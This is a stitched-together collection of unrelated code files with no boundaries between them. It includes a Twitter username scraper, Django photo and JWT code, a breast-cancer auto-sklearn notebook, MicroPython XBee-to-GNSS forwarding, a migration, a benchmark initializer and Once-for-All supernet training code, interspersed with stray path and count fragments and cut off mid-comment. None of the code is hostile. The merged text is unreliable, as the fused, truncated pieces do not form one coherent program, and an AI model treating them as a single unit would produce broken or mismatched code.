TODO automatically verify def write_out_usernames(names): #auth is a global variable api = tweepy.API(auth) e = open('/proj/nlp/users/terra/data/usernames.txt', 'r') f = open('/proj/nlp/users/terra/streaming_results/gathered_usernames.txt', 'a') current_ids = [] for line in e.readlines(): current_ids.append(line.strip().split()[1]) for name in names: try: u = api.get_user(name) if u.id_str not in current_ids: f.write(name+' '+str(u.id_str)+'\n') current_ids.append(u.id_str) except: continue f.close() e.close() return def write_out_correlations(data): f = open('/proj/nlp/users/terra/streaming_results/correlation.txt', 'a') for key in data.keys(): events = data[key] f.write(key+'\n') for e in events: f.write(e+'\n') if len(events) == 0: f.write('no relevant events\n') f.write('\n') f.close() return def get_aggressive_tweets(tweets): content = [t[1] for t in tweets] id_date = [(t[0], t[2]) for t in tweets] results = [] write_out_data(tweets, '/proj/nlp/users/terra/streaming_results/correlate_tmp.csv') predictions = cascade('/proj/nlp/users/terra/streaming_results/correlate_tmp.csv') for p in range(0, len(predictions)): if predictions[p] == 1: results.append(id_date[p]) return results #API connection auth = OAuthHandler(ckey, consumer_secret) auth.set_access_token(access_token_key, access_token_secret) tweet_id = None while 1: tweet_id = correlate(tweet_id, 5) print tweet_id #TODO - set timer for next week delta_t=timedelta(minutes=1) secs=delta_t.total_seconds() print secs sleep(secs) lab1/lab1/views/photo.py from django.core import serializers from django.db.models import F from django.http import HttpResponse, HttpResponseRedirect, QueryDict from django.shortcuts import render from lab1.forms.photo import PhotoForm from lab1.models.photo import Photo from lab1.models.user import User import json def photo_details(request, user_id, photo_id): if not request.user.is_authenticated: return HttpResponse(status=403) try: photo = Photo.objects.get(id=photo_id, user_id=user_id) except Photo.DoesNotExist: return HttpResponse(status=404) if request.method == "GET": return render(request, 'photos/photo_details.html', {'photo': photo}) elif request.method == "PUT": t = QueryDict('', mutable=True) t.update(json.loads(request.body.decode("utf-8"))) form = PhotoForm(t) if form.is_valid(): updated_photo = form.save(commit=False) if updated_photo.title is not None: photo.title = updated_photo.title if updated_photo.image is not None: photo.image = updated_photo.image photo.save() return HttpResponse(status=200) else: return HttpResponse(form, status=400) elif request.method == "DELETE": photo.delete() return HttpResponse(status=200) else: return HttpResponse(status=405) def photos_collection(request, user_id): if not request.user.is_authenticated: return HttpResponse(status=403) if request.method == "POST": t = QueryDict('', mutable=True) t.update(json.loads(request.body.decode("utf-8"))) form = PhotoForm(t) if form.is_valid(): photo = form.save(commit=False) photo.user = User.objects.get(id=user_id) photo.save() response = HttpResponse() response['location']=photo.get_url response.status_code = 201 return response else: return HttpResponse(form, status=400) elif request.method == "GET": photos = Photo.objects.filter(user_id=user_id) return render(request, 'photos/photo_listing.html', {'photos': photos, 'user_id': user_id}) else: return HttpResponse(status=405) 0 #!/usr/bin/env python # coding: utf-8 # #
# Python for Data Science, Homework template: Breast Cancer Selection
# Propulsion Academy, 2021
#
# Goal: Binary classification on Breast Cancer data
#
# Sections:
#   1. Set Up
#   2. Modeling
#   3. Evaluation
#
# Topics Trained: Binary Classification.
# # # # # ## [Set up](#P0) # In[ ]: # !sudo apt-get install build-essential swig # !curl https://raw.githubusercontent.com/automl/auto-sklearn/master/requirements.txt | xargs -n 1 -L 1 pip install # !pip install auto-sklearn # !pip install pipelineprofiler # visualize the pipelines created by auto-sklearn # !pip install shap # !pip install --upgrade plotly # !pip3 install -U scikit-learn # ### Package imports # In[ ]: import numpy as np import pandas as pd from sklearn.model_selection import train_test_split, cross_val_score from sklearn.preprocessing import StandardScaler from sklearn.linear_model import LinearRegression from sklearn import metrics from sklearn import set_config from sklearn.pipeline import Pipeline from pandas_profiling import ProfileReport from sklearn.impute import SimpleImputer from sklearn.metrics import mean_squared_error, accuracy_score, f1_score from sklearn.base import BaseEstimator, TransformerMixin import autosklearn.classification import PipelineProfiler import plotly.express as px import plotly.graph_objects as go from joblib import dump import shap import datetime import logging import matplotlib.pyplot as plt # In[ ]: from sklearn.model_selection import train_test_split, cross_val_score from sklearn.base import BaseEstimator, TransformerMixin from sklearn.preprocessing import StandardScaler, OrdinalEncoder, OneHotEncoder from sklearn import preprocessing from sklearn.metrics import silhouette_score from sklearn import set_config from sklearn.pipeline import Pipeline from sklearn.compose import ColumnTransformer from sklearn.linear_model import LogisticRegression from sklearn.impute import SimpleImputer # Connect to Google Drive # In[ ]: from google.colab import drive drive.mount('/content/drive', force_remount=True) # In[1]: data_path="/content/drive/MyDrive/Introduction2DataScience/W2D2_Assignment/w2d2/data/raw/" model_path = "/content/drive/MyDrive/Introduction2DataScience/W2D2_Assignment/w2d2/models/" timesstr = str(datetime.datetime.now()).replace(' ', '_') logging.basicConfig(filename=f"{model_path}explog_{timesstr}.log", level=logging.INFO) # In[ ]: pd.set_option('display.max_rows', 25) # In[ ]: set_config(display='diagram') # Please Download the data from [this source](https://drive.google.com/file/d/1uMM8qdQSiHHjIiYPd45EPzXH7sqIiQ9t/view?usp=sharing), and upload it on your introduction2DS/data google drive folder. 
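# Before moving on, a quick sanity check (a minimal sketch, assuming the csv was
# uploaded under the data_path defined above with the file name used in the next
# section):

# In[ ]:


import os
assert os.path.exists(f"{data_path}data-breast-cancer.csv"), \
    "Upload data-breast-cancer.csv to the data/raw folder on Google Drive first."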
# # ## [Loading Data and Train-Test Split](#P0) # # **Load the csv file as a DataFrame using Pandas** # In[ ]: # your code here df = pd.read_csv(f'{data_path}data-breast-cancer.csv') df['diagnosis']=df['diagnosis'].map({'M':1, 'B':0}) # In[ ]: df = df.drop(["Unnamed: 32", "id"], axis=1) # In[ ]: test_size = 0.2 random_state = 42 # In[ ]: Y = df['diagnosis'] X = df.drop('diagnosis', axis=1) x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=test_size, random_state=random_state, stratify=Y) # In[ ]: logging.info(f'train test split with test_size={test_size} and random state={random_state}') # In[ ]: total_time = 100 per_run_time_limit = 30 # In[ ]: automl = autosklearn.classification.AutoSklearnClassifier( time_left_for_this_task=total_time, per_run_time_limit=per_run_time_limit, ) automl.fit(x_train, y_train) # In[ ]: # profiler_data= PipelineProfiler.import_autosklearn(automl) # PipelineProfiler.plot_pipeline_matrix(profiler_data) # _Your Comments here_ # In[ ]: logging.info(f'Ran autosklearn regressor for a total time of {total_time} seconds, with a maximum of {per_run_time_limit} seconds per model run') # In[ ]: dump(automl, f'{model_path}model{timesstr}.pkl') # In[ ]: logging.info(f'Saved regressor model at {model_path}model{timesstr}.pkl ') # In[ ]: logging.info(f'autosklearn model statistics:') logging.info(automl.sprint_statistics()) # # ## [Model Evaluation and Explainability](#P0) # In[ ]: y_pred = automl.predict(x_test) # In[ ]: logging.info(f"Accuracy is {accuracy_score(y_test, y_pred)}, \n F1 score is {f1_score(y_test, y_pred)}") # #### Model Explainability # In[ ]: explainer = shap.KernelExplainer(model = automl.predict, data = x_test.iloc[:50, :], link = "identity") # In[ ]: # Set the index of the specific example to explain x_idx = 0 shap_value_single = explainer.shap_values(X = x_test.iloc[x_idx:x_idx+1,:], nsamples = 100) x_test.iloc[x_idx:x_idx+1,:] # print the JS visualization code to the notebook shap.initjs() shap.force_plot(base_value = explainer.expected_value, shap_values = shap_value_single, features = x_test.iloc[x_idx:x_idx+1,:], show=False, matplotlib=True ) plt.savefig(f"{model_path}shap_example_{timesstr}.png") logging.info(f"Shapley example saved as {model_path}shap_example_{timesstr}.png") # In[ ]: shap_values = explainer.shap_values(X = x_test.iloc[0:50,:], nsamples = 100) # In[ ]: # print the JS visualization code to the notebook shap.initjs() fig = shap.summary_plot(shap_values = shap_values, features = x_test.iloc[0:50,:], show=False) plt.savefig(f"{model_path}shap_summary_{timesstr}.png") logging.info(f"Shapley summary saved as {model_path}shap_summary_{timesstr}.png") # In[ ]: # -------------- # # End of This Notebook port_fwd/[01] - xbee_to_gnss.py from sty import Pin from sty import UART import sty import _thread # --------------------------------------------------------------- # On-Board LEDs # --------------------------------------------------------------- led1 = sty.LED(1) led2 = sty.LED(2) led3 = sty.LED(3) # ZED1 message received callback # It is called from ISR!!! # Don't waste the CPU processing time. def OnDataRecvFromZED1(uart, msg): pass # ZED2 message received callback # It is called from ISR!!! # Don't waste the CPU processing time. def OnDataRecvFromZED2(uart, msg): pass # ZED3 message received callback # It is called from ISR!!! # Don't waste the CPU processing time. def OnDataRecvFromZED3(uart, msg): pass # XBEE_LP message received callback # It is called from ISR!!! # Don't waste the CPU processing time. 
def OnDataRecvFromXBeeLP(uart, msg): zed1_uart.send(msg) zed2_uart.send(msg) zed3_uart.send(msg) led1.toggle() # --------------------------------------------------------------- # GNSS Modules # --------------------------------------------------------------- # Power-on the GNSS subsystem gnss_pwr = Pin('PWR_GNSS', Pin.OUT_PP) gnss_pwr.high() # UART configuration of ZEDs zed1_uart = UART('ZED1', 115200, rxbuf=0) zed2_uart = UART('ZED2', 115200, rxbuf=0) zed3_uart = UART('ZED3', 115200, rxbuf=0) # --------------------------------------------------------------- # XBEE Expansions # --------------------------------------------------------------- # Power-on the XBEE LP subsystem xlp_pwr = Pin('PWR_XBEE_LP', Pin.OUT_PP) xlp_pwr.high() # Re-direct the XBEE LP subsystem to the MCU xlp_dir = Pin('XBEE_LP_DIR', Pin.OUT_PP) xlp_dir.high() # XBEE LP UART configuration xlp_uart = UART('XBEE_LP', 115200, rxbuf=0) # Main application process def app_proc(): # Set the GNSS ISR callbacks zed1_uart.callback(OnDataRecvFromZED1) zed2_uart.callback(OnDataRecvFromZED2) zed3_uart.callback(OnDataRecvFromZED3) # Set the XBEE_LP ISR callback xlp_uart.callback(OnDataRecvFromXBeeLP) while True: pass if __name__ == "__main__": # Start the application process _thread.start_new_thread(app_proc, ()) # Generated by Django 4.0.2 on 2022-02-25 10:57 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('PostAPP', '0001_initial'), ] operations = [ migrations.CreateModel( name='ModelNotification', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('content', models.CharField(max_length=250, verbose_name='Bildirim İçeriği')), ('isRead', models.BooleanField(default=False, verbose_name='Okundu mu')), ('createdDate', models.DateTimeField(auto_now_add=True)), ('kind', models.CharField(choices=[('1', 'Takip'), ('2', 'Yorum'), ('3', 'Beğeni')], max_length=7)), ('post', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='PostAPP.modelpost', verbose_name='Post')), ('receiverUser', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='notifs', to=settings.AUTH_USER_MODEL, verbose_name='Alan Kullanıcı')), ('senderUser', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Gönderen Kullanıcı')), ], ), ] npbench/benchmarks/weather_stencils/vadv/vadv.py10-100 # Copyright 2021 ETH Zurich and the NPBench authors. All rights reserved. import numpy as np def initialize(I, J, K): from numpy.random import default_rng rng = default_rng(42) dtr_stage = 3. / 20. # Define arrays utens_stage = rng.random((I, J, K)) u_stage = rng.random((I, J, K)) wcon = rng.random((I + 1, J, K)) u_pos = rng.random((I, J, K)) utens = rng.random((I, J, K)) return dtr_stage, utens_stage, u_stage, wcon, u_pos, utens from rest_framework_simplejwt import authentication class JWTAuthenticationMiddleware: def __init__(self, get_response): self.get_response = get_response def __call__(self, request): """ If request is using a JWT token, sets the 'user' attribute of the request to the autenticated user. 
""" try: auth = authentication.JWTAuthentication().authenticate(request) if auth: request.user = auth[0] except: pass return self.get_response(request) # Once for All: Train One Network and Specialize it for Efficient Deployment # , , , , # International Conference on Learning Representations (ICLR), 2020. import json import torch.nn as nn from tqdm import tqdm import random import os import time import numpy as np from itertools import chain, combinations, permutations import torch import torch.nn.functional as F # import horovod.torch as hvd import distributed from imagenet_codebase.run_manager import DistributedMetric from imagenet_codebase.utils import accuracy, list_mean, cross_entropy_loss_with_soft_target, subset_mean, \ AverageMeter, int2list, download_url, mix_images, mix_labels from imagenet_codebase.data_providers.base_provider import MyRandomResizedCrop from imagenet_codebase.run_manager.distributed_run_manager import DistributedRunManager def validate(run_manager, epoch=0, is_test=True, image_size_list=None, width_mult_list=None, ks_list=None, expand_ratio_list=None, depth_list=None, additional_setting=None): dynamic_net = run_manager.net if isinstance(dynamic_net, nn.DataParallel): dynamic_net = dynamic_net.module dynamic_net.eval() if image_size_list is None: image_size_list = int2list(run_manager.run_config.data_provider.image_size, 1) if width_mult_list is None: width_mult_list = [i for i in range(len(dynamic_net.width_mult_list))] if ks_list is None: ks_list = dynamic_net.ks_list if expand_ratio_list is None: expand_ratio_list = dynamic_net.expand_ratio_list if depth_list is None: depth_list = dynamic_net.depth_list subnet_settings = [] for w in width_mult_list: for d in depth_list: for e in expand_ratio_list: for k in ks_list: for img_size in image_size_list: subnet_settings.append([{ 'image_size': img_size, 'wid': w, 'd': d, 'e': e, 'ks': k, }, 'R%s-W%s-D%s-E%s-K%s' % (img_size, w, d, e, k)]) if additional_setting is not None: subnet_settings += additional_setting losses_of_subnets, top1_of_subnets, top5_of_subnets = [], [], [] valid_log = '' for setting, name in subnet_settings: print(setting) run_manager.write_log('-' * 30 + ' Validate %s ' % name + '-' * 30, 'train', should_print=True) run_manager.run_config.data_provider.assign_active_img_size(setting.pop('image_size')) # setting.pop('image_size') dynamic_net.set_active_subnet(**setting) run_manager.write_log(dynamic_net.module_str, 'train', should_print=True) run_manager.reset_running_statistics(dynamic_net) loss, top1, top5 = run_manager.validate(epoch=epoch, is_test=is_test, run_str=name, net=dynamic_net) losses_of_subnets.append(loss) top1_of_subnets.append(top1) top5_of_subnets.append(top5) valid_log += '%s (%.3f), ' % (name, top1) return list_mean(losses_of_subnets), list_mean(top1_of_subnets), list_mean(top5_of_subnets), valid_log # different submodels are sampled during each step, many submodels are trained in one epoch # total num of epochs = warmup_epochs + num_epoch # dynamic_batchsize sets the number of different models trained in each step(using the same data), loss is then backpropped together def train_one_epoch(run_manager, args, epoch, warmup_epochs=0, warmup_lr=0): dynamic_net = run_manager.net # switch to train mode dynamic_net.train() run_manager.run_config.train_loader.sampler.set_epoch(epoch) MyRandomResizedCrop.EPOCH = epoch nBatch = len(run_manager.run_config.train_loader) data_time = AverageMeter() losses = DistributedMetric('train_loss') top1 = DistributedMetric('train_top1') top5 = 
DistributedMetric('train_top5') # with tqdm(total=nBatch, # desc='Train Epoch #{}'.format(epoch + 1), # disable=not run_manager.is_root) as t: end = time.time() for i, (images, labels) in enumerate(run_manager.run_config.train_loader): data_time.update(time.time() - end) if epoch < warmup_epochs: new_lr = run_manager.run_config.warmup_adjust_learning_rate( run_manager.optimizer, warmup_epochs * nBatch, nBatch, epoch, i, warmup_lr, ) else: new_lr = run_manager.run_config.adjust_learning_rate( run_manager.optimizer, epoch - warmup_epochs, i, nBatch ) images, labels = images.cuda(), labels.cuda() target = labels # soft target if args.kd_ratio > 0: args.teacher_model.train() with torch.no_grad(): soft_logits = args.teacher_model(images).detach() soft_label = F.softmax(soft_logits, dim=1) # clear gradients run_manager.optimizer.zero_grad() loss_of_subnets, acc1_of_subnets, acc5_of_subnets = [], [], [] # compute output subnet_str = '' for _ in range(args.dynamic_batch_size): # set random seed before sampling if args.independent_distributed_sampling: subnet_seed = os.getpid() + time.time() else: subnet_seed = int('%d%.3d%.3d' % (epoch * nBatch + i, _, 0)) random.seed(subnet_seed) subnet_settings = dynamic_net.sample_active_subnet() subnet_str += '%d: ' % _ + ','.join(['%s_%s' % ( key, '%.1f' % subset_mean(val, 0) if isinstance(val, list) else val ) for key, val in subnet_settings.items()]) + ' || ' output = run_manager.net(images) if args.kd_ratio == 0: loss = run_manager.train_criterion(output, labels) loss_type = 'ce' else: if args.kd_type == 'ce': kd_loss = cross_entropy_loss_with_soft_target(output, soft_label) else: kd_loss = F.mse_loss(output, soft_logits) loss = args.kd_ratio * kd_loss + run_manager.train_criterion(output, labels) loss = loss * (2 / (args.kd_ratio + 1)) loss_type = '%.1fkd-%s & ce' % (args.kd_ratio, args.kd_type) # measure accuracy and record loss acc1, acc5 = accuracy(output, target, topk=(1, 5)) loss_of_subnets.append(loss) acc1_of_subnets.append(acc1[0]) acc5_of_subnets.append(acc5[0]) loss = loss / distributed.get_world_size() loss.backward() distributed.sync_grad_sum(run_manager.net) run_manager.optimizer.step() losses.update(list_mean(loss_of_subnets), images.size(0)) top1.update(list_mean(acc1_of_subnets), images.size(0)) top5.update(list_mean(acc5_of_subnets), images.size(0)) if i % 100 == 0 and torch.distributed.get_rank() == 0: string = f"Epoch [{epoch}] Iter [{i}/{nBatch}] " for key, value in { 'task': args.task, 'phase': args.phase, 'loss': losses.avg.item(), 'top1': top1.avg.item(), 'top5': top5.avg.item(), 'R': images.size(2), 'lr': new_lr, 'loss_type': loss_type, 'seed': str(subnet_seed), 'str': subnet_str, 'data_time': data_time.avg, }.items(): string += f"{key}: {value}, " print(string) # t.set_postfix({ # 'task':args.task, # 'phase':args.phase, # 'loss': losses.avg.item(), # 'top1': top1.avg.item(), # 'top5': top5.avg.item(), # 'R': images.size(2), # 'lr': new_lr, # 'loss_type': loss_type, # 'seed': str(subnet_seed), # 'str': subnet_str, # 'data_time': data_time.avg, # }) # t.update(1) end = time.time() # with tqdm(total=nBatch, # desc='Train Epoch #{}'.format(epoch + 1), # disable=not run_manager.is_root) as t: # end = time.time() # for i, (images, labels) in enumerate(run_manager.run_config.train_loader): # data_time.update(time.time() - end) # if epoch < warmup_epochs: # new_lr = run_manager.run_config.warmup_adjust_learning_rate( # run_manager.optimizer, warmup_epochs * nBatch, nBatch, epoch, i, warmup_lr, # ) # else: # new_lr = 
run_manager.run_config.adjust_learning_rate( # run_manager.optimizer, epoch - warmup_epochs, i, nBatch # ) # # images, labels = images.cuda(), labels.cuda() # target = labels # # # soft target # if args.kd_ratio > 0: # args.teacher_model.train() # with torch.no_grad(): # soft_logits = args.teacher_model(images).detach() # soft_label = F.softmax(soft_logits, dim=1) # # # clear gradients # run_manager.optimizer.zero_grad() # # loss_of_subnets, acc1_of_subnets, acc5_of_subnets = [], [], [] # # compute output # subnet_str = '' # for _ in range(args.dynamic_batch_size): # # # set random seed before sampling # if args.independent_distributed_sampling: # subnet_seed = os.getpid() + time.time() # else: # subnet_seed = int('%d%.3d%.3d' % (epoch * nBatch + i, _, 0)) # random.seed(subnet_seed) # subnet_settings = dynamic_net.sample_active_subnet() # subnet_str += '%d: ' % _ + ','.join(['%s_%s' % ( # key, '%.1f' % subset_mean(val, 0) if isinstance(val, list) else val # ) for key, val in subnet_settings.items()]) + ' || ' # # output = run_manager.net(images) # if args.kd_ratio == 0: # loss = run_manager.train_criterion(output, labels) # loss_type = 'ce' # else: # if args.kd_type == 'ce': # kd_loss = cross_entropy_loss_with_soft_target(output, soft_label) # else: # kd_loss = F.mse_loss(output, soft_logits) # loss = args.kd_ratio * kd_loss + run_manager.train_criterion(output, labels) # loss = loss * (2 / (args.kd_ratio + 1)) # loss_type = '%.1fkd-%s & ce' % (args.kd_ratio, args.kd_type) # # # measure accuracy and record loss # acc1, acc5 = accuracy(output, target, topk=(1, 5)) # loss_of_subnets.append(loss) # acc1_of_subnets.append(acc1[0]) # acc5_of_subnets.append(acc5[0]) # loss = loss / distributed.get_world_size() # loss.backward() # distributed.sync_grad_sum(run_manager.net) # run_manager.optimizer.step() # losses.update(list_mean(loss_of_subnets), images.size(0)) # top1.update(list_mean(acc1_of_subnets), images.size(0)) # top5.update(list_mean(acc5_of_subnets), images.size(0)) # # t.set_postfix({ # 'task':args.task, # 'phase':args.phase, # 'loss': losses.avg.item(), # 'top1': top1.avg.item(), # 'top5': top5.avg.item(), # 'R': images.size(2), # 'lr': new_lr, # 'loss_type': loss_type, # 'seed': str(subnet_seed), # 'str': subnet_str, # 'data_time': data_time.avg, # }) # t.update(1) # end = time.time() return losses.avg.item(), top1.avg.item(), top5.avg.item() def train(run_manager, args, validate_func=None): if validate_func is None: validate_func = validate for epoch in range(run_manager.start_epoch, run_manager.run_config.n_epochs + args.warmup_epochs): train_loss, train_top1, train_top5 = train_one_epoch( run_manager, args, epoch, args.warmup_epochs, args.warmup_lr) if (epoch + 1) % args.validation_frequency == 0: # validate under train mode val_loss, val_acc, val_acc5, _val_log = validate_func(run_manager, epoch=epoch, is_test=True) # best_acc is_best = val_acc > run_manager.best_acc run_manager.best_acc = max(run_manager.best_acc, val_acc) if run_manager.is_root: val_log = 'Valid [{0}/{1}] loss={2:.3f}, top-1={3:.3f} ({4:.3f})'. 
\ format(epoch + 1 - args.warmup_epochs, run_manager.run_config.n_epochs, val_loss, val_acc, run_manager.best_acc) val_log += ', Train top-1 {top1:.3f}, Train loss {loss:.3f}\t'.format(top1=train_top1, loss=train_loss) val_log += _val_log run_manager.write_log(val_log, 'valid', should_print=False) run_manager.save_model({ 'epoch': epoch, 'best_acc': run_manager.best_acc, 'optimizer': run_manager.optimizer.state_dict(), 'state_dict': run_manager.net.state_dict(), }, is_best=is_best) def load_models(run_manager, dynamic_net, model_path=None): # specify init path init = torch.load(model_path, map_location='cpu')['state_dict'] dynamic_net.load_weights_from_net(init) run_manager.write_log('Loaded init from %s' % model_path, 'valid') def supporting_elastic_depth(train_func, run_manager, args, validate_func_dict): dynamic_net = run_manager.net if isinstance(dynamic_net, nn.DataParallel): dynamic_net = dynamic_net.module # load stage info stage_info_path = os.path.join(run_manager.path, 'depth.stage') try: stage_info = json.load(open(stage_info_path)) except Exception: stage_info = {'stage': 0} # load pretrained models validate_func_dict['depth_list'] = sorted(dynamic_net.depth_list) if args.phase == 1: load_models(run_manager, dynamic_net, model_path='exp/normal2kernel/checkpoint/model_best.pth.tar') else: load_models(run_manager, dynamic_net, model_path='exp/kernel2kernel_depth/phase1/checkpoint/model_best.pth.tar') # validate after loading weights run_manager.write_log('%.3f\t%.3f\t%.3f\t%s' % validate(run_manager, **validate_func_dict), 'valid') depth_stage_list = dynamic_net.depth_list.copy() depth_stage_list.sort(reverse=True) n_stages = len(depth_stage_list) - 1 start_stage = n_stages - 1 for current_stage in range(start_stage, n_stages): run_manager.write_log( '-' * 30 + 'Supporting Elastic Depth: %s -> %s' % (depth_stage_list[:current_stage + 1], depth_stage_list[:current_stage + 2]) + '-' * 30, 'valid' ) # add depth list constraints supported_depth = depth_stage_list[:current_stage + 2] if len(set(dynamic_net.ks_list)) == 1 and len(set(dynamic_net.expand_ratio_list)) == 1: validate_func_dict['depth_list'] = supported_depth else: validate_func_dict['depth_list'] = sorted({min(supported_depth), max(supported_depth)}) dynamic_net.set_constraint(supported_depth, constraint_type='depth') # train train_func( run_manager, args, lambda _run_manager, epoch, is_test: validate(_run_manager, epoch, is_test, **validate_func_dict) ) # next stage & reset stage_info['stage'] += 1 run_manager.start_epoch = 0 run_manager.best_acc = 0.0 # save and validate run_manager.save_model(model_name='depth_stage%d.pth.tar' % stage_info['stage']) json.dump(stage_info, open(stage_info_path, 'w'), indent=4) validate_func_dict['depth_list'] = sorted(dynamic_net.depth_list) run_manager.write_log('%.3f\t%.3f\t%.3f\t%s' % validate(run_manager, **validate_func_dict), 'valid') def supporting_elastic_expand(train_func, run_manager, args, validate_func_dict): dynamic_net = run_manager.net if isinstance(dynamic_net, nn.DataParallel): dynamic_net = dynamic_net.module # load stage info stage_info_path = os.path.join(run_manager.path, 'expand.stage') try: stage_info = json.load(open(stage_info_path)) except Exception: stage_info = {'stage': 0} # load pretrained models validate_func_dict['expand_ratio_list'] = sorted(dynamic_net.expand_ratio_list) if args.phase == 1: load_models(run_manager, dynamic_net, model_path='exp/kernel2kernel_depth/phase2/checkpoint/model_best.pth.tar') else: load_models(run_manager, dynamic_net, 
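# A small worked example of the stage bookkeeping in supporting_elastic_depth above: with
# depth_list = [2, 3, 4], start_stage == n_stages - 1 means the loop runs exactly one stage
# and immediately unlocks the full depth range.
depth_stage_list = sorted([2, 3, 4], reverse=True)    # [4, 3, 2]
n_stages = len(depth_stage_list) - 1                  # 2
start_stage = n_stages - 1                            # 1
for current_stage in range(start_stage, n_stages):    # only current_stage == 1 runs
    supported_depth = depth_stage_list[:current_stage + 2]
    print(supported_depth)                            # [4, 3, 2]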
model_path='exp/kernel_depth2kernel_depth_width/phase1/checkpoint/model_best.pth.tar') dynamic_net.re_organize_middle_weights() run_manager.write_log('%.3f\t%.3f\t%.3f\t%s' % validate(run_manager, **validate_func_dict), 'valid') expand_stage_list = dynamic_net.expand_ratio_list.copy() expand_stage_list.sort(reverse=True) n_stages = len(expand_stage_list) - 1 start_stage = n_stages - 1 for current_stage in range(start_stage, n_stages): run_manager.write_log( '-' * 30 + 'Supporting Elastic Expand Ratio: %s -> %s' % (expand_stage_list[:current_stage + 1], expand_stage_list[:current_stage + 2]) + '-' * 30, 'valid' ) # add expand list constraints supported_expand = expand_stage_list[:current_stage + 2] if len(set(dynamic_net.ks_list)) == 1 and len(set(dynamic_net.depth_list)) == 1: validate_func_dict['expand_ratio_list'] = supported_expand else: validate_func_dict['expand_ratio_list'] = sorted({min(supported_expand), max(supported_expand)}) dynamic_net.set_constraint(supported_expand, constraint_type='expand_ratio') # train train_func( run_manager, args, lambda _run_manager, epoch, is_test: validate(_run_manager, epoch, is_test, **validate_func_dict) ) # next stage & reset stage_info['stage'] += 1 run_manager.start_epoch = 0 run_manager.best_acc = 0.0 dynamic_net.re_organize_middle_weights(expand_ratio_stage=stage_info['stage']) if isinstance(run_manager, DistributedRunManager): run_manager.broadcast() # save and validate run_manager.save_model(model_name='expand_stage%d.pth.tar' % stage_info['stage']) json.dump(stage_info, open(stage_info_path, 'w'), indent=4) validate_func_dict['expand_ratio_list'] = sorted(dynamic_net.expand_ratio_list) run_manager.write_log('%.3f\t%.3f\t%.3f\t%s' % validate(run_manager, **validate_func_dict), 'valid') def train_supernet(run_manager, args, validate_func=None, cur_model_id=-1): if validate_func is None: validate_func = validate for epoch in range(run_manager.start_epoch, run_manager.end_epoch + args.warmup_epochs): train_loss, train_top1, train_top5 = train_supernet_one_epoch( run_manager, args, epoch, args.warmup_epochs, args.warmup_lr) if (epoch + 1) % args.validation_frequency == 0: # validate under train mode val_loss, val_acc, val_acc5, _val_log = validate_func(run_manager, epoch=epoch, is_test=True) # best_acc is_best = val_acc > run_manager.best_acc run_manager.best_acc = max(run_manager.best_acc, val_acc) if run_manager.is_root: val_log = 'Valid [{0}/{1}] loss={2:.3f}, top-1={3:.3f} ({4:.3f})'. 
\ format(epoch + 1 - args.warmup_epochs, run_manager.run_config.n_epochs, val_loss, val_acc, run_manager.best_acc) val_log += ', Train top-1 {top1:.3f}, Train loss {loss:.3f}\t'.format(top1=train_top1, loss=train_loss) val_log += _val_log run_manager.write_log(val_log, 'valid', should_print=False) if cur_model_id >= 0: run_manager.save_model({ 'epoch': epoch, 'best_acc': run_manager.best_acc, 'optimizer': run_manager.optimizer.state_dict(), 'state_dict': run_manager.net.state_dict(), }, is_best=is_best, model_name='submodel_' + str(cur_model_id) + '_checkpoint.pth.tar', cur_model_id=cur_model_id) else: run_manager.save_model({ 'epoch': epoch, 'best_acc': run_manager.best_acc, 'optimizer': run_manager.optimizer.state_dict(), 'state_dict': run_manager.net.state_dict(), }, is_best=is_best) # different submodels are sampled during each step, many submodels are trained in one epoch # total num of epochs = warmup_epochs + num_epoch # dynamic_batchsize sets the number of different models trained in each step(using the same data), loss is then backpropped together def train_supernet_one_epoch(run_manager, args, epoch, warmup_epochs=0, warmup_lr=0): dynamic_net = run_manager.net # switch to train mode dynamic_net.train() run_manager.run_config.train_loader.sampler.set_epoch(epoch) MyRandomResizedCrop.EPOCH = epoch nBatch = len(run_manager.run_config.train_loader) data_time = AverageMeter() losses = DistributedMetric('train_loss') top1 = DistributedMetric('train_top1') top5 = DistributedMetric('train_top5') # with tqdm(total=nBatch, # desc='Train Epoch #{}'.format(epoch + 1), # disable=not run_manager.is_root) as t: end = time.time() for i, (images, labels) in enumerate(run_manager.run_config.train_loader): data_time.update(time.time() - end) if epoch < warmup_epochs: new_lr = run_manager.run_config.warmup_adjust_learning_rate( run_manager.optimizer, warmup_epochs * nBatch, nBatch, epoch, i, warmup_lr, ) else: new_lr = run_manager.run_config.adjust_learning_rate( run_manager.optimizer, epoch - warmup_epochs, i, nBatch ) images, labels = images.cuda(), labels.cuda() target = labels # soft target if args.kd_ratio > 0: args.teacher_model.train() with torch.no_grad(): soft_logits = args.teacher_model(images).detach() soft_label = F.softmax(soft_logits, dim=1) # clear gradients run_manager.optimizer.zero_grad() loss_of_subnets, acc1_of_subnets, acc5_of_subnets = [], [], [] # compute output subnet_str = '' for _ in range(args.dynamic_batch_size): # set random seed before sampling if args.independent_distributed_sampling: subnet_seed = os.getpid() + time.time() else: subnet_seed = int('%d%.3d%.3d' % (epoch * nBatch + i, _, 0)) random.seed(subnet_seed) subnet_settings = dynamic_net.sample_active_subnet() subnet_str += '%d: ' % _ + ','.join(['%s_%s' % ( key, '%.1f' % subset_mean(val, 0) if isinstance(val, list) else val ) for key, val in subnet_settings.items()]) + ' || ' output = run_manager.net(images) if args.kd_ratio == 0: loss = run_manager.train_criterion(output, labels) loss_type = 'ce' else: if args.kd_type == 'ce': kd_loss = cross_entropy_loss_with_soft_target(output, soft_label) else: kd_loss = F.mse_loss(output, soft_logits) loss = args.kd_ratio * kd_loss + run_manager.train_criterion(output, labels) loss = loss * (2 / (args.kd_ratio + 1)) loss_type = '%.1fkd-%s & ce' % (args.kd_ratio, args.kd_type) # measure accuracy and record loss acc1, acc5 = accuracy(output, target, topk=(1, 5)) loss_of_subnets.append(loss) acc1_of_subnets.append(acc1[0]) acc5_of_subnets.append(acc5[0]) loss = loss / 
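# When independent_distributed_sampling is off, the subnet seed used above is just the
# global step with the subnet index zero-padded onto it, so every worker seeds `random`
# with the same value and samples the same subnet for a given batch. Quick check of the
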